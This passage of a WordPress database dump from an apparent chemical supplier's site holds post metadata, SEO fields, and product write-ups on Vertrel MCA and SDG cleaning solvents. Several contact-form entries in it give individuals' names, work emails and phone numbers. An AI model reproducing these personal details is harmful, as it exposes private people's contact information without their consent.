INSERT INTO `wp_postmeta` VALUES (22058, 2318, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3750;s:6:"height";i:2500;s:4:"file";s:33:"2016/10/shutterstock_72669607.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:33:"shutterstock_72669607-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:33:"shutterstock_72669607-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:33:"shutterstock_72669607-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:35:"shutterstock_72669607-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:33:"shutterstock_72669607-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:33:"shutterstock_72669607-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:33:"shutterstock_72669607-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:33:"shutterstock_72669607-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:67;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (22059, 2317, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (22060, 2318, '_wp_attachment_image_alt', ''); 
INSERT INTO `wp_postmeta` VALUES (22061, 2312, '_thumbnail_id', '2318'); 
INSERT INTO `wp_postmeta` VALUES (22062, 2312, '_yoast_wpseo_linkdex', '100'); 
INSERT INTO `wp_postmeta` VALUES (22063, 2319, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (22064, 2319, '_seq_num', '27'); 
INSERT INTO `wp_postmeta` VALUES (22065, 2319, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (22066, 2319, '_field_12', 'Kim Nguyen'); 
INSERT INTO `wp_postmeta` VALUES (22067, 2319, '_field_13', ''); 
INSERT INTO `wp_postmeta` VALUES (22068, 2319, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (22069, 2319, '_field_14', 'kim.p.nguyen@disney.com'); 
INSERT INTO `wp_postmeta` VALUES (22070, 2319, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (22071, 2319, '_field_16', 'Hello - \r\nI&#039;d like to request the volatile organic compound (VOC) content for MS 580 Precision Cleaning Solvent (aeroosl) as part of our company&#039;s chemical review process. \r\nThank you, \r\nKim Nguyen\r\n714-781-7643'); 
INSERT INTO `wp_postmeta` VALUES (22072, 2319, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (22073, 2319, '_sub_id', '2319'); 
INSERT INTO `wp_postmeta` VALUES (22074, 2320, '_wp_attached_file', '2016/10/shutterstock_419810209.jpg'); 
INSERT INTO `wp_postmeta` VALUES (22075, 2320, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4273;s:6:"height";i:2849;s:4:"file";s:34:"2016/10/shutterstock_419810209.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_419810209-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_419810209-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_419810209-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_419810209-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_419810209-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_419810209-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_419810209-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_419810209-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (22076, 2317, '_thumbnail_id', '2320'); 
INSERT INTO `wp_postmeta` VALUES (22078, 2317, '_disclaimer_post_meta', ''); 
INSERT INTO `wp_postmeta` VALUES (22079, 2317, 'ninja_forms_form', '1'); 
INSERT INTO `wp_postmeta` VALUES (22080, 2317, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (22081, 2317, 'U_S_C_message', ''); 
INSERT INTO `wp_postmeta` VALUES (22082, 2317, '_yoast_wpseo_focuskw_text_input', 'Krytox Product'); 
INSERT INTO `wp_postmeta` VALUES (22083, 2317, '_yoast_wpseo_focuskw', 'Krytox Product'); 
INSERT INTO `wp_postmeta` VALUES (22084, 2317, '_yoast_wpseo_title', 'Krytox Product Selection Guide - Choosing the Right Lubricant'); 
INSERT INTO `wp_postmeta` VALUES (22085, 2317, '_yoast_wpseo_metadesc', 'This Krytox Product Selection Guide provides general properties and cites the technical data reference document where additional information can be found.'); 
INSERT INTO `wp_postmeta` VALUES (22086, 2317, '_yoast_wpseo_content_score', '60'); 
INSERT INTO `wp_postmeta` VALUES (22087, 2317, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (22088, 2317, '_yoast_wpseo_primary_category', '117'); 
INSERT INTO `wp_postmeta` VALUES (22090, 2317, '_yoast_wpseo_linkdex', '100'); 
INSERT INTO `wp_postmeta` VALUES (22091, 2322, '_edit_lock', '1476301989:2'); 
INSERT INTO `wp_postmeta` VALUES (22092, 2322, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (22093, 2323, '_wp_attached_file', '2016/10/Steam-Control-Valve.jpg'); 
INSERT INTO `wp_postmeta` VALUES (22094, 2323, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1137;s:6:"height";i:470;s:4:"file";s:31:"2016/10/Steam-Control-Valve.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:31:"Steam-Control-Valve-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:31:"Steam-Control-Valve-800x331.jpg";s:5:"width";i:800;s:6:"height";i:331;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:31:"Steam-Control-Valve-768x317.jpg";s:5:"width";i:768;s:6:"height";i:317;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:31:"Steam-Control-Valve-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:31:"Steam-Control-Valve-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:31:"Steam-Control-Valve-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:31:"Steam-Control-Valve-510x470.jpg";s:5:"width";i:510;s:6:"height";i:470;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:100;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (22095, 2324, '_wp_attached_file', '2016/10/shutterstock_317927645.jpg'); 
INSERT INTO `wp_postmeta` VALUES (22096, 2324, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:4000;s:6:"height";i:2667;s:4:"file";s:34:"2016/10/shutterstock_317927645.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_317927645-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_317927645-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_317927645-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_317927645-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_317927645-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_317927645-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_317927645-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_317927645-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (22097, 2322, '_thumbnail_id', '2324'); 
INSERT INTO `wp_postmeta` VALUES (22099, 2322, '_ak_article', '1'); 
INSERT INTO `wp_postmeta` VALUES (22100, 2322, '_disclaimer_post_meta', ''); 
INSERT INTO `wp_postmeta` VALUES (22101, 2322, 'ninja_forms_form', '1'); 
INSERT INTO `wp_postmeta` VALUES (22102, 2322, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (22103, 2322, 'U_S_C_message', ''); 
INSERT INTO `wp_postmeta` VALUES (22104, 2322, '_yoast_wpseo_focuskw_text_input', 'Steam Control Valve Lubricant'); 
INSERT INTO `wp_postmeta` VALUES (22105, 2322, '_yoast_wpseo_focuskw', 'Steam Control Valve Lubricant'); 
INSERT INTO `wp_postmeta` VALUES (22106, 2322, '_yoast_wpseo_title', 'Krytox - Steam Control Valve Lubricant - GPL 206 PTFE Grease'); 
INSERT INTO `wp_postmeta` VALUES (22107, 2322, '_yoast_wpseo_metadesc', 'Krytox GPL 206 grease met the challenge for lubrication of the steam control valve lubricant bushing. The power plant now enjoys reduced maintenance.'); 
INSERT INTO `wp_postmeta` VALUES (22108, 2322, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (22109, 2322, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (22110, 2322, '_yoast_wpseo_primary_category', '117'); 
INSERT INTO `wp_postmeta` VALUES (22112, 2322, '_yoast_wpseo_linkdex', '98'); 
INSERT INTO `wp_postmeta` VALUES (22114, 2329, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (22115, 2329, '_seq_num', '34'); 
INSERT INTO `wp_postmeta` VALUES (22116, 2329, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (22117, 2329, '_field_1', 'Art Hand'); 
INSERT INTO `wp_postmeta` VALUES (22118, 2329, '_field_10', 'MedPlast'); 
INSERT INTO `wp_postmeta` VALUES (22119, 2329, '_field_2', 'ahand@medplastgroup.com'); 
INSERT INTO `wp_postmeta` VALUES (22120, 2329, '_field_8', '(814) 367-2246'); 
INSERT INTO `wp_postmeta` VALUES (22121, 2329, '_field_3', 'We currently use one of your products, MS-122 AD (DPMS-Z0918A, PTFE Release Agent/Dry Lubricant) and would like to know if fluorine is used in this compound. We don&#039;t need to know how much but if it is used in this product.\n\nYour response would be greatly appreciated.'); 
INSERT INTO `wp_postmeta` VALUES (22122, 2329, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (22123, 2329, '_sub_id', '2329'); 
INSERT INTO `wp_postmeta` VALUES (22124, 2331, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (22125, 2331, '_seq_num', '28'); 
INSERT INTO `wp_postmeta` VALUES (22126, 2331, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (22127, 2331, '_field_12', 'Matt Kremer'); 
INSERT INTO `wp_postmeta` VALUES (22128, 2331, '_field_13', 'Danfoss'); 
INSERT INTO `wp_postmeta` VALUES (22129, 2331, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (22130, 2331, '_field_14', 'matthew.kremer@danfoss.com'); 
INSERT INTO `wp_postmeta` VALUES (22131, 2331, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (22132, 2331, '_field_16', 'I&#039;m interested in SDS&#039;s for the following products\nMS-114N\nMS-465N\nMS-470N'); 
INSERT INTO `wp_postmeta` VALUES (22133, 2331, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (22134, 2331, '_sub_id', '2331'); 
INSERT INTO `wp_postmeta` VALUES (22135, 2332, '_wp_attached_file', '2016/10/MS-136W-145W.pdf'); 
INSERT INTO `wp_postmeta` VALUES (22136, 2312, '318_custom_list_file', 'a:1:{s:32:"b291b7f24d5e9ea94b63fb0442ef5930";a:3:{s:4:"name";s:7:"MS-145W";s:4:"file";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/10/MS-136W-145W.pdf";s:4:"desc";s:7:"MS-145W";}}'); 
INSERT INTO `wp_postmeta` VALUES (22137, 2333, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (22138, 2333, '_seq_num', '35'); 
INSERT INTO `wp_postmeta` VALUES (22139, 2333, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (22140, 2333, '_field_1', 'Yulia Gudkova'); 
INSERT INTO `wp_postmeta` VALUES (22141, 2333, '_field_10', 'PHSA'); 
INSERT INTO `wp_postmeta` VALUES (22142, 2333, '_field_2', 'yulia.gudkova@phsa.ca'); 
INSERT INTO `wp_postmeta` VALUES (22143, 2333, '_field_8', '(604) 297-8772'); 
INSERT INTO `wp_postmeta` VALUES (22144, 2333, '_field_3', 'Hello there,\r\n\r\nI am writing to request an updated MSDS for MS-260 Safezone Cleaner for Plastic, Glass &amp; Metal please. I am unable to locate the MSDS on your website so any help would be greatly appreciated.\r\n\r\nThank you very much,\r\nYulia Gudkova\r\n'); 
INSERT INTO `wp_postmeta` VALUES (22145, 2333, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (22146, 2333, '_sub_id', '2333'); 
INSERT INTO `wp_postmeta` VALUES (22147, 1263, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (22148, 1263, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (22149, 1263, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (22150, 1263, '_yoast_wpseo_focuskw_text_input', 'Vertrel MCA'); 
INSERT INTO `wp_postmeta` VALUES (22151, 1263, '_yoast_wpseo_focuskw', 'Vertrel MCA'); 
INSERT INTO `wp_postmeta` VALUES (22152, 1263, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (22153, 1263, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (22154, 1263, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (22155, 1263, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (22156, 1263, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (22157, 1263, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (22158, 1263, '_ywtm_content_tab_description', 'Vertrel MCA is a proprietary azeotrope of Vertrel XF hydrofluorocarbon (2,3-dihydrodeca-fluoropentane) with trans-1,2-dichloroethylene. It is ideally suited for use in vapor degreasing equipment. Its enhanced solvency power, compared to Vertrel XF alone, makes it particularly effective for precision and specialty cleaning with difficult soils.\r\n\r\nVertrel MCA has zero ozone depletion potential and low global warming potential. It can replace CFC-113, methylchloroform (1,1,1-TCA), hydrochlorofluorocarbons (HCFCs), and perfluorocarbons (PFCs) in many applications. Vertrel MCA is accepted by the U.S. Environmental Protection Agency (EPA) under the Significant New Alternatives Policy (SNAP) program, as a substitute for ozone-depleting substances.\r\n\r\n<strong>Cleaning Process</strong>\r\n\r\nVapor degreasing should be used for optimum cleaning effectiveness and economy. Modern vapor containment technology is recommended for both batch and in-line equipment. These systems have higher freeboard and a secondary set of low-temperature (–29°C [–20°F]) condenser coils to reduce vapor loss.\r\n\r\nVertrel MCA has a broad range of cleaning capabilities. Table 1 lists some typical soils readily removed from parts in a short vapor degreasing cycle.\r\n\r\nTable 1. Soils Cleaned with Vertrel MCA\r\n<table width="465">\r\n<tbody>\r\n<tr>\r\n<td width="223">Cutting Oils</td>\r\n<td width="242">Stamping Oils</td>\r\n</tr>\r\n<tr>\r\n<td>Gear Oils</td>\r\n<td>Vacuum Oils</td>\r\n</tr>\r\n<tr>\r\n<td>Heavy Greases</td>\r\n<td>Waxes</td>\r\n</tr>\r\n<tr>\r\n<td>Hydraulic Oils</td>\r\n<td>Mineral Oils</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Plastic and Elastomer Compatibility</strong>\r\n\r\nVertrel MCA is compatible with most polymeric materials commonly encountered in degreasing of precision parts. Acrylic, ABS, and polycarbonate parts, particularly if under stress, may show slight cracking or crazing damage and should be tested. EPDM, butyl rubber, Buna-S, and neoprene are recommended for elastomeric parts.\r\n\r\nTables 2 and 3 summarize test results on short-term exposures of unstressed plastics and elastomers simulating a typical cleaning cycle. Long-term compatibility data simulating exposure of vapor degreaser construction materials is available from Miller-Stephenson upon request.\r\n\r\n<strong>Table 2.</strong> Plastic Compatibility Immersion: 15 Minutes at Room Temperature\r\n<table width="465">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="2" width="465"><strong>Compatible</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">Polyethylene</td>\r\n<td style="text-align: left;">Acetal</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">Polyvinylchloride</td>\r\n<td style="text-align: left;">Epoxy</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">Polyester, PET, PBT</td>\r\n<td style="text-align: left;">Liquid Crystal Polymer</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">Polyimide, PI, PEI, PAI</td>\r\n<td style="text-align: left;">Phenolic</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">Polyetherketone, PEK</td>\r\n<td>PTFE, ETFE</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">Polyaryletherketone, PEEK</td>\r\n<td style="text-align: left;">Chlorinated PVC</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">Polyarylsulfone, PAS</td>\r\n<td style="text-align: left;">Ionomer</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">Polypropylene</td>\r\n<td style="text-align: left;">ABS</td>\r\n</tr>\r\n<tr>\r\n<td>Polyphenylene Sulfide, PPS</td>\r\n<td>Polysulfone, PSO</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" colspan="2"><strong>Incompatible*</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Polystyrene</td>\r\n<td>Acrylic</td>\r\n</tr>\r\n<tr>\r\n<td>Polyphenylene Oxide, PPO</td>\r\n<td>Cellulosic</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n*Material composition varies depending upon compounding agents, plasticizers, processing, etc. Specific materials should be tested for compatibility with solvent.\r\n\r\n<strong>Table 3. </strong>Elastomer Compatibility Immersion: 1 Week at 39°C (102°F)\r\n<table width="465">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="2" width="465"><strong>Compatible</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Polysulfide (Thiokol FA)</td>\r\n<td>EPDM (Nordel®)</td>\r\n</tr>\r\n<tr>\r\n<td>Chlorosulfonated PE</td>\r\n<td>Butyl Rubber*</td>\r\n</tr>\r\n<tr>\r\n<td>Neoprene*</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" colspan="2"><strong>Require Additional Testing</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Buna-N</td>\r\n<td>Polychloroprene</td>\r\n</tr>\r\n<tr>\r\n<td>Urethane</td>\r\n<td>Silicone</td>\r\n</tr>\r\n<tr>\r\n<td>Buna-S*</td>\r\n<td>Natural Rubber</td>\r\n</tr>\r\n<tr>\r\n<td>Fluoroelastomers</td>\r\n<td></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n*Swelling, but with low extractables\r\n\r\nElastomer swelling and shrinking will, in most cases, revert to within a few percent of original size after air drying. Swell, shrinkage, and extractables are strongly affected by the compounding agents, plasticizers, and curing used in the manufacture of plastics and elastomers. Therefore, prior in-use testing is particularly important.\r\n\r\n<strong>Metals and Other Compatibility</strong>\r\n\r\nVertrel MCA was found compatible with aluminum, copper, and iron, with and without oil present, after exposure for 2 weeks at 120°C (248°F) in sealed tubes. Contact with highly basic process materials, pH 10 or above, is not recommended.\r\n\r\n<strong>Safety/Flammability</strong>\r\n\r\nVertrel MCA exhibits no closed cup or open cup flash point and is not classified as a flammable liquid by NFPA or DOT. In addition, the product has no vapor flammability limits in air. Flash point data and limits of flammability in air provide the user with additional information that should be used as elements of a fire risk assessment and to determine guidelines for the safe handling of volatile chemicals. Users should ensure compliance with NFPA standards and local fire codes.\r\n\r\n<strong>Recovery</strong>\r\n\r\nDue to the azeotropic nature of Vertrel MCA, the product is easily recoverable by off-line or in-line distillation equipment, such as a vapor degreaser or still. The presence of soil, however, may alter the characteristics of the material during the recovery operation. Recovery should be closely monitored to ensure operating levels are maintained. Users should test the spent Vertrel MCA to ensure proper classification for waste disposal.\r\n\r\n<strong>Environmental Legislation</strong>\r\n\r\nVertrel specialty fluids have zero ozone depletion potential and low global warming potential (Table 7). They are used as alternatives to CFC-113, methylchloroform, HCFCs, and PFCs in many critical cleaning, drying, carrier fluid, and other high-value specialty uses where reliability is paramount.\r\n\r\nVertrel MCA is accepted by the EPA under the SNAP program as a substitute for ozone-depleting substances.\r\n\r\nThe components of Vertrel MCA are listed in the TSCA inventory. One component, HFC-43-10mee, is subject to the Significant New Use Rule (SNUR) and should be used only in the indicated applications. See SDS Regulatory Section.\r\n\r\nVertrel MCA is not a hazardous air pollutant (HAP) and, therefore, not subject to NESHAP regulation. Vertrel MCA is not included in the SARA Title III Section 313 list of toxic chemicals and is not subject to SARA Title III (EPCRA) reporting requirements.\r\n\r\n<a href="https://www.miller-stephenson.com/vertrel-fluids/">To learn more about Vertrel and its ability to remove nPBs please click here. </a>\r\n\r\n&nbsp;'); 
INSERT INTO `wp_postmeta` VALUES (22159, 1263, '_yoast_wpseo_linkdex', '86'); 
INSERT INTO `wp_postmeta` VALUES (22160, 1268, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (22161, 1268, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (22162, 1268, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (22163, 1268, '_yoast_wpseo_focuskw_text_input', 'Vertrel SDG'); 
INSERT INTO `wp_postmeta` VALUES (22164, 1268, '_yoast_wpseo_focuskw', 'Vertrel SDG'); 
INSERT INTO `wp_postmeta` VALUES (22165, 1268, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (22166, 1268, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (22167, 1268, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (22168, 1268, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (22169, 1268, '_ywtm_priority_tab_description', '10'); 
INSERT INTO `wp_postmeta` VALUES (22170, 1268, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (22171, 1268, '_ywtm_content_tab_description', '<strong>Introduction to Vertrel SDG</strong>\r\n\r\nVertrel SDG is an engineered mixture of nonflammable hydrofluorocarbons (HFCs) and trans-1,2-dichloroethylene (t-DCE). Vertrel SDG is designed to replace trichloroethylene (TCE) and n-propyl bromide (nPB); and perform in applications where maximum cleaning power is needed. It can also be used as a substitute for other cleaners such HCFC-225 and its blends, HCFC-141b, HFEs, PFCs, CFCs, and aqueous cleaners when safety and environmental concerns and/or floor space and cleanliness are at a premium.\r\n\r\nVertrel SDG has excellent solvency power for a wide range of soils including oils, greases, waxes and hydraulic fluids. The high solvency power, low surface tension and non-flammability properties of Vertrel SDG make it an ideal ultrasonic vapor degreasing solvent.\r\n\r\n<strong>Features and Benefits</strong>\r\n\r\nSDG does a good job balancing performance with favorable environmental and worker safety properties.\r\n<ul>\r\n 	<li>Excellent solvency power (KB Value = 95): Superior cleaning performance</li>\r\n 	<li>Good solvency for silicone fluids</li>\r\n 	<li>Fast drying: Increases productivity</li>\r\n 	<li>Low surface tension: Able to penetrate and clean tight areas</li>\r\n 	<li>Compatible with most plastics, elastomers, and metals</li>\r\n 	<li>Can be used with ultrasonics</li>\r\n 	<li>Non flammable</li>\r\n 	<li>Low toxicity</li>\r\n 	<li>Zero ozone depletion potential</li>\r\n 	<li>Low global warming potential</li>\r\n 	<li>Existing equipment can be used with minor or no modification</li>\r\n 	<li>No surfactants needed: Residue free cleaning is promoted.</li>\r\n</ul>\r\n<strong>Typical Applications</strong>\r\n\r\nVertrel SDG is ideal for a wide range of cleaning applications including:\r\n<ul>\r\n 	<li>Oil, grease, and wax removal</li>\r\n 	<li>Silicone carrier fluid</li>\r\n 	<li>Silicone grease removal</li>\r\n 	<li>Precision Cleaning</li>\r\n</ul>\r\n<strong>Specification Conformity Tests</strong>\r\n\r\nVertrel SDG has been tested in a variety of industry tests, including:\r\nBoeing D6-17487 Revision P Solvent Cleaners; General Cleaning\r\nARP 1755 B Effect of Cleaning Agent on Aircraft Engine Materials\r\n\r\nDouglas Aircraft Company Type 1: Materials and Procedures for General Exterior Cleaning of Painted and Unpainted Surfaces. (General Purpose Cleaner)\r\n\r\n<strong>Environmental</strong>\r\n\r\nVertrel SDG has “zero” ozone depletion potential and low global warming potential. See table below for various environmental properties of Vertrel SDG. Vertrel SDG is accepted by the US Environmental Protection Agency under the Significant New Alternatives Policy (SNAP) program as a substitute for ozone-depleting substances (solvent category). It is not SNAP approved for aerosol packages.\r\n\r\n<strong>Safety/Flammability/Storage</strong>\r\n\r\nData from acute toxicity studies has demonstrated that SDG has low toxicity. It has a calculated AEL (Acceptable Exposure Limit) of 193 ppm based on its individual components. AEL is an airborne inhalation exposure limit established by Dupont that specifies time-weighted average concentrations to which nearly all workers may be repeatedly exposed without adverse effects. The calculated AEL is in accordance with ACGIH formulas for TLVs for mixtures. Vertrel SDG is a slight skin and eye irritant and has low acute 